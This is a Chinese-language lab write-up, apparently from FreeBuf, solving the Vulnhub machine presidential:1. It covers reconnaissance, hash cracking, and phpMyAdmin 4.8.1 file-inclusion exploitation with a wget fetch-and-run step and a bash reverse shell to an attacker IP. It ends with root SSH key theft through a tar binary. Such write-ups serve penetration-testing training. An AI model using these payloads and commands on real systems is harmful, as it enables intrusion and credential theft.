freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub靶场presidential:1
2020-08-19 03:36:24

0x00靶机信息

靶机:presidential:1

难度:中-难

下载:https://www.vulnhub.com/entry/presidential-1,500/

0x01信息收集

靶场网段:192.168.250.0/24

Nmap扫描靶场网段,寻找目标靶机IP以及相关端口以及服务

1
2
nmap -sn 192.168.250.0/24
nmap -sV -p- 192.168.250.132

IP:192.168.250.132

端口:80(http)2082(ssh)

打开网站,果不其然也是个静态页面,但是页面内有个邮箱,邮箱的域名我们本地改host绑定一下

接下来扫描目录寻找有价值的信息

1
nikto -h  http://votenow.local

打开config.php一片空白

使用dirsearch再扫下目录看看有没有漏扫

1
python3 dirsearch.py -u http://votenow.local -e php

config.php.bak同样的一片空白,但是在源码内,有一些重要信息

是数据库的账号密码,但是数据库页面还没见到个影,爆破一下子域名试试

1
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.loca

再次去host里绑定

用config.php.bak里的账号密码登入

user表有一个账号密码加密了,使用john解密

1
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt john.txt

0x02漏洞利用

phpmyadmin的版本为4.8.1,这个版本有本地包含漏洞

开始利用

SQL执行

1
select '<?phpphpinfo();exit;?>'

然后包含session

1
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_4ribtr9diq98423tqfja79srek4ol8sj

创建反弹文件

1
cd /var/www/html | echo 'bash -i >& /dev/tcp/192.168.250.129/1100 0>&1' > shell.s

再执行SQL命令

1
select '<?phpsystem("wget 192.168.250.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'

nc开始监听

1
nc -lvv 1100

解决shell输入字母会变成双写

1
python -c 'import pty; pty.spawn("/bin/bash")'

0x03提权

我们切换用户到admin用户,密码是Stella,之前user表解密出来的

尝试提权,sudo提权失败,根目录的notes.txt文件提示的大概意思就是让我们使用压缩的命令

使用tars

1
2
3
4
tarS -cvf key.tar /root/.ssh/id_rsa
tar -xvf key.tar
cd root/.ssh
ssh -i id_rsa root@localhost -p 2082

至此通关

# 渗透测试 # web安全 # 靶场 # vulnhub靶机 # 靶场实战
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者